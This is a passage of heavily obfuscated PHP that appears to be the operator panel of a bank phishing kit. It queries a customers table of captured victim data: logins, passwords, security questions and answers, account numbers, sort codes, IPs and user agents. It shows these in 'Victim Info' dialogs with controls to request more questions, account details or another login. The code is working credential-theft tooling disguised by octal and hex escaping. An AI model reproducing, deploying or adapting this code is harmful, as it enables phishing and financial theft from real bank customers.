3\163\75\47\x63\154\157\x73\x65\47\40\157\156\143\154\151\143\153\x3d\47\x63\154\157\x73\x65\x5f\142\x74\x6e\x28\51\x27\40\x61\x72\x69\141\55\154\x61\x62\x65\154\x3d\x27\103\x6c\x6f\x73\x65\x27\x3e\xa\x9\x9\11\11\11\x9\x9\x9\x9\74\x73\160\x61\x6e\x20\141\162\151\141\55\150\x69\x64\144\145\156\75\x27\x74\162\165\145\47\x20\163\x74\x79\154\145\x3d\47\x63\157\x6c\x6f\162\72\x77\x68\x69\164\145\47\x3e\46\164\x69\x6d\145\x73\x3b\x3c\57\x73\x70\141\156\76\12\x9\11\11\x9\11\11\x9\x9\x3c\57\x62\x75\x74\x74\x6f\156\76\xa\x9\11\x9\x9\11\11\11\x3c\57\x64\151\166\x3e\12\11\11\11\11\x9\11\x9\x3c\x64\x69\166\40\x63\154\141\163\163\x3d\47\155\x6f\x64\x61\154\55\x62\157\x64\171\x27\76\12\x9\11\11\11\11\x9\x9\x9\x3c\x64\151\x76\x20\x63\x6c\x61\163\163\75\47\146\157\162\155\x2d\x67\x72\157\165\160\47\40\x73\164\x79\154\145\x3d\x27\155\141\162\147\x69\156\x2d\142\157\164\x74\157\155\x3a\x31\162\x65\155\x27\76\xa\x9\x9\x9\11\11\x9\11\x9\11\74\142\162\x3e\12\11\11\11\11\x9\11\x9\x9\x9\74\164\145\x78\x74\x61\162\145\x61\x20\151\x64\75\x27\x74\145\170\164\141\162\145\x61\157\x70\164\x69\x6f\x6e\x73\x27\40\143\x6c\141\163\163\75\47\146\x6f\x72\x6d\x2d\143\x6f\x6e\x74\x72\x6f\154\47\x20\144\151\163\x61\x62\x6c\145\x64\75\x27\x64\151\x73\x61\x62\154\145\x64\47\40\162\x6f\167\x73\75\x27\x31\66\47\x20\x73\x74\x79\x6c\145\75\x27\x68\145\151\x67\x68\x74\72\x33\x30\x30\160\170\x3b\47\76{$data_log}\x3c\57\x74\145\x78\x74\141\162\145\141\76\12\11\11\11\11\x9\x9\x9\11\x3c\x2f\144\151\166\x3e\xa\11\x9\x9\x9\x9\x9\x9\x9\11\12\11\x9\x9\11\11\11\x9\x9\x3c\x74\141\x62\154\145\40\163\x74\x79\154\x65\75\x27\x77\151\144\164\150\x3a\x20\61\x30\x30\45\73\142\x61\143\153\x67\x72\x6f\165\156\x64\55\143\x6f\154\157\162\x3a\40\142\154\x61\x63\x6b\x3b\143\x6f\154\157\162\x3a\x20\167\x68\x69\164\145\x3b\x70\x61\x64\144\x69\x6e\147\72\40\61\x30\45\x3b\x27\x3e\xa\x9\x9\11\11\11\11\11\x9\x9\74\x74\x62\157\144\171\40\x73\164\171\154\145\x3d\x27\154\x69\156\x65\x2d\x68\145\151\x67\150\164\72\x31\x30\x30\45\x3b\x27\x3e\12\x9\11\x9\x9\x9\x9\11\11\x9\12\x9\11\11\x9\11\x9\11\x9\x9\x9\74\x74\x72\76\12\x9\x9\11\x9\11\11\11\x9\11\11\11\x3c\164\144\76\12\x9\11\x9\11\11\x9\11\11\x9\11\11\x9\74\x64\x69\x76\40\x63\x6c\141\x73\x73\75\x27\x66\157\x72\155\x2d\x63\x68\145\143\153\47\x3e\12\x9\11\x9\x9\11\11\x9\x9\11\x9\x9\11\x9\74\154\141\142\x65\154\40\x66\157\x72\x3d\47\x61\x73\x6b\143\150\141\x72\163\x72\x61\144\x69\x6f\x30{$value["\x69\144"]}\x27\x20\143\154\141\x73\x73\x3d\47\x66\157\162\x6d\x2d\143\150\145\143\153\x2d\154\x61\x62\x65\154\x27\76\xa\x9\11\11\x9\x9\11\x9\11\x9\11\x9\11\11\11\x3c\x69\156\x70\165\164\40\164\171\x70\145\x3d\47\162\x61\x64\151\157\47\40\x6e\x61\x6d\145\x3d\47\163\x74\x61\x74\165\163\47\x20\x76\141\x6c\165\145\x3d\x27\x31\x31\x27\x20\151\x64\x3d\47\141\163\x6b\143\150\x61\162\x73\x72\141\144\x69\157\60{$value["\151\144"]}\x27\40\x6f\156\143\154\151\143\x6b\75\47\x73\150\x6f\x77\x66\x69\x65\x6c\144\x73\x28{$value["\x69\x64"]}\51\73\x27\x20\x63\x6c\141\x73\163\75\x27\x73\x74\141\164\x75\163\x20\x66\x6f\x72\x6d\55\x63\x68\145\x63\x6b\55\x69\156\160\x75\x74\47\x3e\12\x9\x9\x9\x9\11\x9\11\11\x9\11\x9\11\x9\11\74\x73\160\141\x6e\76\x52\x65\161\165\145\163\164\x20\121\165\x65\x73\x74\151\157\x6e\x3c\57\x73\x70\x61\x6e\x3e\12\x9\x9\x9\11\x9\x9\x9\x9\11\x9\11\x9\11\x3c\x2f\154\x61\142\145\154\x3e\xa\x9\x9\x9\x9\x9\x9\x9\x9\x9\11\x9\x9\x3c\57\x64\x69\x76\x3e\12\11\11\x9\11\11\x9\x9\11\11\11\x9\x9\74\41\x2d\x2d\40\x49\156\x70\x75\x74\x20\143\150\x61\162\x61\143\164\x65\x72\x73\40\55\55\x3e\xa\x9\x9\11\11\x9\x9\11\x9\x9\x9\11\x9\x3c\144\151\x76\x20\x63\154\x61\x73\x73\75\x27\x66\157\162\155\55\147\162\x6f\165\x70\x27\x20\163\x74\171\154\145\75\47\x64\151\x73\x70\x6c\141\171\72\x6e\157\156\x65\x3b\47\x20\x69\144\75\47\x61\x73\153\x63\150\141\x72\163\60{$value["\x69\x64"]}\x27\x3e\12\11\x9\x9\x9\11\x9\11\11\x9\x9\11\11\11\x3c\144\x69\x76\x20\143\x6c\x61\163\163\75\x27\x72\x6f\x77\47\x20\x73\x74\171\154\145\75\x27\x6d\x61\162\x67\151\x6e\55\x6c\x65\146\x74\72\x35\x25\73\x6d\141\162\x67\x69\x6e\x2d\164\x6f\x70\72\x35\x70\170\x27\x20\x3e\12\x9\x9\11\x9\x9\11\11\x9\x9\x9\11\11\x9\x9\x3c\x64\x69\166\x20\143\x6c\141\163\163\x3d\x27\x63\x6f\x6c\x27\x3e\12\x9\x9\11\x9\11\11\11\x9\x9\x9\11\11\x9\11\11\74\x69\x6e\160\165\164\x20\164\x79\160\x65\x3d\x27\164\145\170\x74\47\40\x63\154\141\163\x73\75\47\x66\157\x72\155\55\143\157\x6e\x74\x72\157\x6c\x27\x20\x70\x6c\x61\x63\x65\150\157\x6c\x64\145\162\75\x27\105\x6e\x74\x65\x72\x20\x71\165\x65\x73\x74\x69\157\156\40\150\x65\x72\145\x27\x20\156\141\x6d\145\75\47\163\x65\x63\x71\165\x65\x27\x20\x69\144\x3d\47\163\x65\x63\x71\165\x65\47\x20\x73\x74\171\154\x65\75\x27\x6d\x61\162\x67\x69\x6e\55\162\151\x67\x68\x74\x3a\61\60\x70\x78\x3b\x62\x6f\x72\144\145\x72\x2d\x63\x6f\x6c\157\x72\x3a\x23\144\x36\144\66\x65\65\x27\76\xa\x9\11\11\11\x9\11\x9\11\x9\11\x9\11\11\11\74\x2f\144\151\x76\76\xa\x9\x9\x9\x9\x9\x9\11\11\11\x9\11\x9\11\x3c\57\144\151\166\x3e\12\x9\x9\11\x9\11\x9\11\11\x9\x9\11\x9\74\57\x64\x69\x76\76\12\11\x9\x9\11\x9\x9\x9\x9\x9\11\11\74\x2f\x74\144\76\12\x9\11\11\11\11\11\x9\11\x9\x9\11\74\164\144\x3e\xa\11\x9\x9\11\x9\x9\x9\11\11\11\11\x9\74\144\151\166\40\143\154\x61\x73\163\75\47\x66\x6f\x72\x6d\55\x63\150\145\143\153\x27\76\xa\x9\11\x9\x9\11\x9\11\x9\x9\11\11\11\x9\x3c\154\x61\142\x65\154\x20\146\x6f\x72\x3d\47\x61\163\x6b\x63\150\141\162\163\162\141\x64\x69\157\x31{$value["\151\144"]}\47\x20\x63\154\141\x73\x73\x3d\47\x66\x6f\x72\x6d\x2d\x63\150\145\143\x6b\x2d\154\x61\x62\145\154\47\76\12\11\x9\11\11\x9\11\11\x9\11\x9\11\11\11\x9\74\151\x6e\160\x75\x74\x20\x74\x79\160\145\75\47\162\141\x64\151\157\x27\40\x6e\x61\155\145\x3d\x27\x73\x74\141\x74\x75\163\x27\x20\x76\x61\x6c\165\145\x3d\x27\61\x32\47\x20\x69\144\75\47\141\x73\x6b\x63\x68\x61\x72\x73\x72\x61\144\151\157\61{$value["\x69\144"]}\47\40\x6f\156\x63\154\151\x63\153\75\x27\163\150\x6f\167\x66\x69\x65\x6c\x64\x73\50{$value["\x69\144"]}\x29\73\47\40\x63\x6c\141\x73\x73\75\x27\163\164\x61\x74\165\163\x20\146\157\162\x6d\x2d\x63\x68\145\x63\153\55\151\x6e\160\x75\164\x27\76\xa\x9\x9\11\11\x9\11\11\11\x9\11\11\11\11\11\74\163\160\141\156\x3e\122\x65\x71\165\x65\x73\x74\40\101\x63\x63\x74\40\x49\x6e\146\x6f\x3c\x2f\163\x70\x61\x6e\x3e\12\x9\x9\11\11\x9\11\x9\11\11\11\11\11\11\x3c\57\x6c\x61\142\145\154\x3e\xa\11\11\11\11\x9\11\x9\11\11\x9\11\11\x3c\x2f\x64\151\166\x3e\xa\11\11\x9\x9\11\11\11\11\11\11\x9\x3c\57\x74\x64\x3e\12\x9\11\x9\11\x9\11\11\x9\11\x9\74\x2f\164\162\76\12\11\11\11\x9\x9\x9\11\x9\11\x9\11\xa\x9\11\x9\x9\x9\11\x9\11\11\x9\74\x74\162\76\xa\11\x9\11\11\x9\11\11\11\x9\11\x9\x3c\x74\144\x3e\12\x9\x9\11\11\11\x9\11\x9\11\x9\x9\11\x3c\144\x69\x76\40\143\154\x61\163\x73\x3d\x27\146\x6f\x72\155\x2d\143\150\x65\x63\153\x27\76\xa\11\11\x9\x9\x9\x9\x9\x9\x9\11\x9\11\11\x3c\x6c\x61\x62\145\154\x20\146\157\162\75\47\146\151\x6e\x69\x73\x68\x72\141\144\x69\157\60{$value["\151\144"]}\x27\40\x63\x6c\x61\x73\163\75\x27\146\157\x72\155\55\x63\x68\x65\x63\153\55\x6c\x61\142\x65\x6c\47\76\xa\11\x9\11\11\11\x9\x9\11\x9\11\x9\11\11\11\74\x69\x6e\160\165\164\40\x74\171\160\145\x3d\x27\162\141\144\x69\x6f\47\x20\x6e\x61\155\x65\x3d\47\x73\x74\x61\164\165\x73\x27\40\x76\141\154\165\x65\x3d\47\62\60\47\40\x69\144\x3d\47\x66\151\x6e\151\x73\150\x72\141\144\x69\157\60{$value["\x69\x64"]}\47\x20\157\x6e\x63\x6c\x69\x63\x6b\x3d\47\163\x68\x6f\167\x66\151\145\x6c\x64\x73\50{$value["\x69\x64"]}\x29\73\47\40\143\154\x61\x73\163\75\x27\x73\x74\x61\x74\165\x73\40\x66\157\x72\155\x2d\143\x68\145\x63\x6b\55\151\156\160\x75\164\x27\x3e\12\x9\x9\11\11\11\11\11\x9\x9\x9\11\11\x9\11\x3c\x73\x70\x61\x6e\76\106\x69\x6e\x69\x73\150\74\x2f\163\x70\141\156\76\12\11\11\x9\11\11\11\11\11\x9\11\x9\11\x9\x3c\57\154\x61\142\145\154\x3e\xa\x9\x9\11\x9\x9\11\11\11\11\x9\11\11\x3c\x2f\144\x69\x76\x3e\12\11\11\11\x9\x9\x9\x9\x9\11\11\x9\74\57\x74\144\76\xa\x9\11\x9\11\x9\11\x9\x9\x9\x9\11\74\x74\x64\76\12\11\11\11\x9\x9\11\x9\11\11\11\11\x9\74\144\x69\166\x20\143\x6c\x61\163\x73\x3d\47\x66\x6f\162\155\x2d\x63\150\x65\143\153\47\76\xa\11\x9\11\11\11\x9\x9\x9\x9\11\x9\x9\x9\x3c\x6c\141\x62\x65\x6c\x20\146\x6f\162\75\47\141\x73\x6b\x6c\x6f\147\x69\156\162\141\x64\151\x6f\60{$value["\151\x64"]}\x27\x20\x63\x6c\141\x73\163\x3d\x27\146\x6f\x72\155\55\143\x68\145\x63\x6b\55\x6c\x61\x62\x65\x6c\x27\x3e\12\11\11\11\11\11\11\11\x9\11\11\x9\x9\11\11\x3c\151\156\x70\x75\164\x20\164\x79\160\145\x3d\47\162\141\x64\151\157\47\x20\156\x61\155\x65\x3d\x27\163\164\x61\x74\x75\x73\47\40\x76\x61\x6c\165\x65\x3d\47\65\60\x27\40\151\144\x3d\47\x61\163\x6b\154\157\147\x69\x6e\x72\141\144\x69\x6f\x30{$value["\151\144"]}\x27\40\157\156\x63\154\x69\143\x6b\75\x27\x73\x68\157\167\x66\151\145\154\144\163\50{$value["\151\x64"]}\51\x3b\47\x20\x63\x6c\x61\163\163\75\x27\x73\164\141\x74\x75\x73\40\x66\157\162\x6d\55\143\150\145\143\x6b\x2d\151\156\160\x75\164\47\76\12\x9\x9\11\x9\x9\11\11\x9\x9\x9\x9\x9\x9\11\x3c\x73\160\x61\x6e\x3e\122\145\161\165\145\163\164\x20\x6c\157\x67\151\x6e\x20\x61\x67\x61\151\x6e\x20\x3c\x2f\x73\x70\x61\x6e\76\12\x9\x9\11\x9\11\x9\x9\x9\x9\x9\11\11\x9\74\57\x6c\x61\x62\x65\x6c\x3e\12\11\x9\11\x9\11\11\11\11\11\x9\11\x9\x3c\57\144\x69\x76\76\xa\11\11\x9\11\x9\x9\x9\x9\x9\11\x9\74\57\164\x64\76\xa\x9\x9\x9\x9\11\11\11\x9\11\11\x3c\x2f\x74\x72\x3e\xa\x9\11\11\x9\11\x9\11\x9\x9\x9\12\11\11\11\11\x9\x9\x9\11\11\x9\x3c\41\x2d\x2d\x3c\x74\x72\x3e\12\x9\x9\11\x9\11\x9\11\11\11\11\11\x3c\164\144\x3e\xa\11\11\11\x9\11\11\11\x9\11\11\11\11\x3c\144\151\166\40\143\154\141\x73\163\75\x27\146\157\162\155\x2d\x63\x68\145\143\x6b\47\x3e\12\x9\x9\11\11\x9\11\x9\11\x9\x9\11\x9\x9\x3c\x6c\141\x62\145\154\40\146\x6f\x72\x3d\x27\x73\x65\x6e\144\x61\167\141\x79\x72\x61\144\151\157\60{$value["\151\x64"]}\x27\40\x63\x6c\x61\x73\x73\x3d\x27\146\157\x72\x6d\x2d\x63\150\145\143\153\55\x6c\141\142\145\154\47\x3e\xa\x9\x9\11\11\x9\x9\11\11\11\x9\11\x9\x9\11\74\x69\x6e\160\165\x74\x20\164\171\x70\145\75\x27\162\x61\144\151\x6f\47\40\x6e\x61\x6d\145\x3d\47\x73\164\141\164\x75\x73\x27\40\166\x61\154\x75\145\x3d\47\x31\60\x30\47\40\151\x64\x3d\x27\x73\x65\x6e\144\141\167\x61\x79\x72\x61\144\x69\157\x30{$value["\151\x64"]}\x27\x20\x6f\x6e\x63\154\x69\143\153\75\x27\x73\150\157\x77\x66\x69\x65\x6c\144\x73\50{$value["\x69\x64"]}\x29\x3b\x27\40\x63\154\141\163\163\75\x27\163\x74\141\164\165\163\40\146\157\162\155\55\143\x68\145\143\153\x2d\151\156\x70\x75\x74\x27\76\xa\11\11\11\x9\x9\x9\x9\11\11\x9\x9\x9\11\x9\x3c\x73\x70\x61\x6e\x3e\x49\156\x76\141\x6c\x69\144\54\40\123\145\x6e\x64\40\x61\167\x61\x79\74\57\x73\160\141\x6e\76\xa\11\11\x9\x9\x9\11\x9\x9\11\x9\x9\x9\11\x3c\x2f\154\141\142\145\x6c\76\xa\x9\11\11\x9\11\x9\11\x9\11\11\x9\x9\x3c\57\144\151\166\x3e\xa\11\11\x9\11\11\x9\x9\11\11\x9\x9\x3c\x2f\164\144\x3e\xa\11\11\x9\x9\11\11\11\x9\11\x9\x3c\57\164\x72\76\55\x2d\76\12\x9\x9\x9\x9\11\x9\x9\x9\x9\x9\xa\11\11\x9\x9\11\x9\11\x9\x9\74\x2f\x74\x62\x6f\x64\x79\76\xa\11\11\x9\x9\x9\x9\11\11\x3c\57\164\x61\142\154\145\76\12\11\11\x9\x9\11\11\11\74\x2f\144\x69\x76\x3e\xa\x9\11\x9\11\x9\x9\x9\74\41\x2d\x2d\40\105\156\x64\40\143\157\x6d\155\x61\x6e\144\163\40\x65\x64\151\x74\40\x2d\55\76\xa\12\x9\11\11\11\x9\x9\x9\x3c\x64\x69\166\x20\143\x6c\141\x73\x73\x3d\47\155\157\x64\141\x6c\55\146\157\157\x74\145\x72\47\40\163\164\x79\154\145\x3d\x27\155\141\162\147\x69\x6e\55\164\x6f\x70\x3a\x2d\64\60\160\x78\47\76\xa\x9\11\x9\11\11\x9\x9\x9\x3c\x62\x75\x74\164\x6f\156\x20\x74\171\x70\x65\75\47\142\x75\164\x74\x6f\x6e\x27\x20\143\x6c\141\x73\x73\75\47\142\164\156\40\142\x74\156\x2d\x73\145\x63\157\156\x64\x61\x72\x79\47\40\157\x6e\143\154\x69\x63\153\x3d\47\x63\x6c\157\163\145\137\x62\164\x6e\50\51\x27\x20\144\x61\164\141\55\144\x69\x73\x6d\x69\163\x73\75\x27\155\157\x64\x61\154\x27\76\103\154\157\163\145\74\x2f\x62\x75\164\164\x6f\156\76\xa\x9\x9\x9\11\11\x9\11\11\74\142\165\164\x74\157\x6e\x20\151\144\x3d\x27\x73\141\166\145\137{$value["\x69\x64"]}\47\40\157\x6e\x63\x6c\151\143\x6b\x3d\47\x66\157\162\x6d\137\x73\x75\142\155\x69\164\50\164\150\151\x73\51\x27\x20\164\x79\x70\x65\x3d\47\142\x75\x74\x74\157\x6e\47\x20\143\154\141\163\163\x3d\47\142\x74\156\x20\x62\164\x6e\55\160\x72\x69\155\141\162\x79\47\x3e\x53\x61\166\145\74\57\142\165\164\164\x6f\156\76\xa\11\11\x9\11\11\x9\x9\x3c\x2f\x64\x69\x76\x3e\12\11\11\x9\x9\x9\11\x3c\x2f\144\x69\x76\76\xa\11\11\x9\11\x9\74\57\144\151\166\x3e\xa\x9\11\11\x9\74\57\x66\157\x72\155\76\12\11\x9\11\x3c\x2f\x64\151\x76\76\12\11\11\x9"; } } if (isset($_GET["\x66\145\164\143\x68\x5f\x70\143\137\146\151\156\x69\163\x68\x5f\155\157\144\x61\154\137\144\141\x74\141"])) { $query = mysqli_query($conn, "\x53\x45\114\x45\x43\124\40\x2a\x20\146\x72\157\x6d\40\143\165\x73\164\157\x6d\x65\162\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\165\x73\162\154\x6f\147\151\x6e"]; $usrpass = $value["\165\163\162\x70\x61\163\163"]; $secans = $value["\163\x65\x63\141\156\163"]; $secque = $value["\163\x65\143\x71\165\145"]; $acct = $value["\x61\143\x63\x74"]; $sort = $value["\163\157\x72\x74"]; $ip = $value["\x69\160"]; $useragent = urldecode($value["\x75\x73\145\162\141\147\145\x6e\164"]); $data_log = "\12\x3d\75\75\75\75\342\x89\xab\x20\x4c\157\147\x69\x6e\x20\342\211\xaa\75\75\x3d\75\75\xa\x55\x73\145\162\x20\111\104\x20\72\40{$usrlogin}\12\120\141\x73\x73\x20\x3a\x20{$usrpass}\12\x3d\x3d\75\x3d\x3d\xe2\x89\xab\x20\123\x65\x63\165\x72\x69\164\171\40\342\x89\xaa\75\x3d\x3d\75\x3d\12\x53\145\x63\x75\162\151\164\x79\40\101\x6e\x73\x77\145\162\x3a\40{$secque}\xa\123\x65\143\x75\x72\x69\164\171\40\x41\x6e\163\x77\x65\162\72\40{$secans}\xa\x3d\x3d\75\x3d\x3d\xe2\x89\xab\40\101\143\143\x6f\165\156\164\x20\342\211\252\x3d\x3d\75\75\x3d\12\x41\x63\x63\x6f\x75\156\164\x20\116\x6f\x2e\x20\72\40{$acct}\12\x53\157\x72\164\x20\143\x6f\144\x65\x20\72\40{$sort}\12\x3d\75\75\x3d\x3d\x3d\75\75\x3d\75\x3d\x3d\75\75\75\75\x3d\x3d\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\75\x3d\xa\111\x50\40\72\x20{$ip}\12\125\101\40\72\40{$useragent}\xa\75\x3d\75\x3d\x3d\75\75\75\x3d\75\75\75\75\75\75\x3d\75\75\75\x3d\75\75\75\x3d\x3d\75\x3d\75\75\75\x3d"; echo "\xa\11\11\11\xa\11\11\11\74\x64\x69\x76\x20\x63\x6c\x61\163\163\75\x27\x6d\x6f\144\x61\154\x20\146\141\144\145\47\x20\x69\x64\x3d\47\166\x69\145\x77\155\157\144\141\154\x5f\x75\x73\x65\x72\x69\x64\x5f{$value["\x69\144"]}\x27\x20\164\x61\142\x69\156\x64\145\170\x3d\x27\x2d\x31\47\x20\x72\157\154\x65\75\x27\x64\151\141\154\157\x67\x27\x20\x61\162\x69\141\55\x6c\141\x62\145\x6c\x6c\145\x64\x62\171\75\47\145\x78\x61\x6d\160\154\145\115\x6f\144\141\x6c\114\x61\x62\x65\154\x27\40\x73\164\171\x6c\x65\75\47\157\160\141\143\x69\x74\171\72\61\x20\41\x69\155\x70\157\162\164\141\156\164\73\x64\151\163\x70\x6c\x61\171\x3a\x6e\x6f\156\145\73\x68\145\151\x67\150\x74\72\61\x30\60\x25\73\157\x76\x65\x72\146\154\x6f\x77\x3a\x73\143\162\x6f\154\154\73\x27\x20\x61\x72\151\141\x2d\x68\151\144\x64\x65\x6e\75\47\164\162\x75\x65\47\x3e\xa\x9\x9\11\12\x9\11\11\x9\74\x66\x6f\162\x6d\40\156\141\155\145\x3d\47\x63\x6f\x6e\x66\x69\x67\137\x66\x6f\x72\155\137{$value["\x69\144"]}\x27\40\151\144\75\47\x63\x6f\156\x66\x69\x67\x5f\x66\x6f\x72\x6d\137{$value["\151\144"]}\x27\40\155\x65\164\150\157\144\75\x27\120\x4f\123\x54\x27\40\x61\143\x74\x69\x6f\156\x3d\x27\47\40\156\157\x76\141\x6c\x69\x64\x61\164\x65\x3e\12\x9\11\11\11\x9\x3c\151\x6e\160\165\164\x20\x74\171\160\145\x3d\47\x68\151\x64\144\x65\x6e\47\40\156\x61\x6d\x65\75\47\x75\163\145\162\x69\x64\47\x20\166\x61\154\165\x65\x3d\47{$value["\x69\x64"]}\47\x3e\xa\11\11\11\11\11\x3c\x64\x69\166\x20\143\x6c\141\x73\163\x3d\47\155\x6f\144\141\154\55\144\151\141\x6c\157\147\x27\x20\x72\157\x6c\x65\x3d\47\x64\x6f\143\165\155\x65\x6e\x74\x27\x20\163\164\171\154\145\75\47\167\x69\144\x74\150\x3a\65\60\60\160\170\x27\x3e\12\x9\x9\11\11\x9\x9\74\144\151\166\x20\143\x6c\141\163\163\75\47\x6d\x6f\144\x61\154\x2d\x63\x6f\x6e\x74\145\156\164\47\76\12\x9\x9\11\11\11\11\11\74\x64\x69\166\x20\x63\154\141\x73\x73\x3d\x27\155\157\x64\x61\x6c\55\x68\x65\x61\x64\145\162\47\40\163\164\171\x6c\x65\75\47\142\x61\143\x6b\x67\x72\157\x75\x6e\x64\x2d\x63\x6f\154\x6f\x72\x3a\x23\63\64\64\x39\x35\x45\73\146\x6f\156\x74\55\163\x69\172\x65\72\62\x2e\67\x72\145\155\x3b\164\145\170\164\x2d\141\154\x69\147\x6e\72\x63\x65\156\x74\x65\162\73\47\x3e\12\x9\x9\11\11\11\11\11\x9\74\150\x35\40\x63\x6c\141\x73\x73\75\47\155\157\x64\141\x6c\x2d\164\x69\x74\154\x65\x27\x20\x69\144\x3d\47\x65\170\x61\x6d\x70\154\145\x4d\x6f\144\141\x6c\114\x61\142\x65\154\47\x20\x73\164\171\x6c\145\75\x27\x63\157\154\x6f\x72\x3a\167\150\151\x74\x65\x27\76\126\151\x63\x74\x69\155\40\x49\x6e\146\x6f\x3c\57\150\65\x3e\12\11\11\x9\x9\x9\11\11\x9\x3c\x62\165\164\164\x6f\x6e\x20\x74\x79\160\x65\75\x27\142\165\x74\x74\157\156\x27\x20\143\x6c\141\x73\x73\x3d\47\x63\154\157\x73\145\x27\x20\144\141\x74\x61\55\x64\151\163\x6d\151\x73\x73\75\47\155\x6f\144\141\x6c\x27\40\141\x72\x69\141\55\154\141\142\x65\x6c\x3d\47\103\x6c\x6f\x73\145\x27\x3e\12\11\11\x9\x9\11\11\x9\x9\11\74\x73\160\141\x6e\40\x61\x72\151\x61\x2d\150\x69\x64\144\145\x6e\x3d\47\164\x72\x75\x65\x27\40\x73\164\x79\154\145\75\x27\143\x6f\154\157\162\x3a\x77\150\151\164\145\47\76\x26\164\151\x6d\145\163\73\74\x2f\x73\x70\x61\156\x3e\xa\x9\x9\11\x9\11\x9\11\x9\x3c\x2f\x62\165\x74\x74\157\156\x3e\12\x9\x9\11\x9\x9\11\11\74\57\144\x69\166\76\xa\11\11\x9\11\x9\11\x9\x3c\144\x69\166\40\x63\x6c\141\163\x73\x3d\47\x6d\157\x64\141\154\55\142\157\x64\x79\x27\76\12\x9\x9\x9\11\11\x9\11\11\74\x64\x69\166\40\x63\x6c\141\x73\163\x3d\47\146\x6f\162\x6d\55\x67\x72\x6f\x75\160\x27\76\12\11\11\11\11\11\x9\x9\x9\11\x3c\142\x72\x3e\xa\11\x9\x9\x9\x9\x9\x9\11\11\x3c\x74\145\x78\164\141\162\145\x61\x20\151\144\75\47\x74\x65\170\x74\141\162\145\141\146\x69\156\151\x73\x68\x27\40\x63\x6c\141\x73\163\x3d\x27\146\x6f\162\155\55\143\157\x6e\x74\162\157\x6c\47\40\x64\x69\x73\141\x62\x6c\x65\144\75\47\144\x69\x73\x61\x62\154\x65\144\47\40\162\157\x77\x73\x3d\47\x31\62\x27\76{$data_log}\74\57\x74\x65\170\x74\141\162\x65\141\x3e\12\x9\11\x9\11\11\11\x9\11\74\57\x64\x69\x76\76\xa\x9\x9\11\11\11\11\x9\x3c\57\144\x69\166\x3e\xa\x9\11\11\x9\11\x9\11\74\x64\151\166\x20\143\154\x61\163\163\75\x27\155\157\x64\x61\x6c\x2d\x66\157\157\164\145\x72\x27\40\163\164\171\154\145\x3d\47\x6d\141\162\x67\151\x6e\x2d\x74\x6f\160\72\x2d\x34\60\x70\x78\47\x3e\xa\11\11\11\11\x9\11\11\x9\x3c\142\165\x74\164\x6f\156\40\x74\x79\160\x65\x3d\47\x62\x75\x74\x74\x6f\x6e\47\x20\143\154\141\163\x73\75\47\142\164\x6e\40\x62\164\156\x2d\x6c\147\40\142\164\156\x2d\144\x61\x72\x6b\x20\x63\x6f\154\55\x31\62\x27\x20\x6f\x6e\143\x6c\151\x63\153\75\x27\143\154\157\x73\145\137\142\164\156\50\51\x27\x3e\103\x4c\117\123\x45\74\57\x62\x75\164\x74\x6f\x6e\x3e\xa\x9\x9\x9\11\x9\11\11\74\57\x64\151\x76\x3e\12\x9\x9\11\x9\x9\11\x3c\57\x64\151\x76\x3e\12\x9\11\x9\11\11\x3c\x2f\x64\151\166\76\12\11\x9\x9\11\74\x2f\x66\x6f\x72\155\76\xa\x9\11\11\74\57\x64\151\166\76\12\11\x9\x9"; } } if (isset($_GET["\x66\145\x74\143\150\x5f\x6d\x6f\144\141\x6c\137\144\x61\x74\141"])) { $query = mysqli_query($conn, "\123\105\114\x45\103\x54\x20\x2a\40\x66\162\x6f\x6d\40\143\165\x73\x74\157\155\145\162\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\x75\x73\x72\x6c\x6f\x67\151\156"]; $usrpass = $value["\x75\163\162\160\141\x73\x73"]; $secans = $value["\x73\x65\x63\141\156\x73"]; $secque = $value["\x73\x65\x63\x71\x75\145"]; $acct = $value["\141\x63\x63\164"]; $sort = $value["\x73\x6f\x72\164"]; $ip = $value["\x69\x70"]; $useragent = urldecode($value["\x75\x73\x65\162\x61\147\x65\156\164"]); echo "\xa\x9\12\11\11\x9\74\144\x69\x76\x20\143\154\141\163\x73\x3d\47\155\157\x64\141\154\40\x66\141\144\145\47\40\151\x64\75\x27\x6d\x6f\x64\x61\x6c\137\165\163\145\x72\x69\x64\137{$value["\x69\x64"]}\x27\x20\x74\x61\142\x69\x6e\x64\x65\170\x3d\47\55\61\x27\x20\162\x6f\x6c\x65\75\47\144\151\x61\154\x6f\x67\47\x20\x73\x74\171\x6c\145\x3d\x27\x6f\x70\141\x63\151\164\x79\72\61\x20\41\151\x6d\160\157\162\x74\141\156\164\x3b\144\x69\x73\x70\x6c\141\171\72\x6e\x6f\x6e\x65\x3b\150\x65\151\x67\150\x74\72\x31\60\x30\45\73\x6f\166\145\162\x66\x6c\157\x77\72\x73\143\x72\x6f\x6c\x6c\x3b\x27\40\x61\162\151\x61\55\x6c\141\x62\x65\154\x6c\x65\144\142\x79\x3d\47\x65\x78\141\155\x70\154\x65\x4d\x6f\144\141\154\114\141\x62\x65\x6c\47\x20\141\x72\x69\x61\55\x68\x69\x64\x64\145\x6e\x3d\x27\164\162\165\x65\x27\76\xa\x9\11\11\12\11\11\11\x9\74\146\157\x72\155\x20\x6e\x61\155\x65\x3d\47\x63\x6f\x6e\x66\x69\147\x5f\146\157\x72\155\137{$value["\151\144"]}\47\40\x69\x64\75\x27\143\157\156\146\151\147\x5f\x66\157\x72\155\137{$value["\151\144"]}\47\40\x6d\x65\x74\x68\x6f\x64\75\x27\120\117\x53\124\47\x20\141\x63\x74\151\x6f\156\75\x27\x27\40\156\x6f\166\141\154\151\144\x61\164\145\76\12\11\x9\x9\11\x9\74\151\x6e\x70\x75\x74\x20\x74\x79\x70\x65\75\47\150\x69\144\x64\x65\x6e\47\x20\x6e\x61\x6d\145\75\47\x75\163\x65\x72\x69\x64\47\40\166\141\x6c\165\x65\75\x27{$value["\x69\144"]}\x27\x3e\12\11\x9\x9\x9\x9\74\x64\151\x76\40\x63\x6c\x61\163\x73\x3d\47\155\x6f\144\x61\x6c\x2d\144\151\141\154\157\x67\x27\x20\162\x6f\x6c\x65\x3d\47\144\157\143\165\x6d\145\x6e\x74\x27\x20\163\164\x79\x6c\x65\x3d\47\x6d\x61\162\x67\x69\x6e\55\x74\157\160\72\62\60\x25\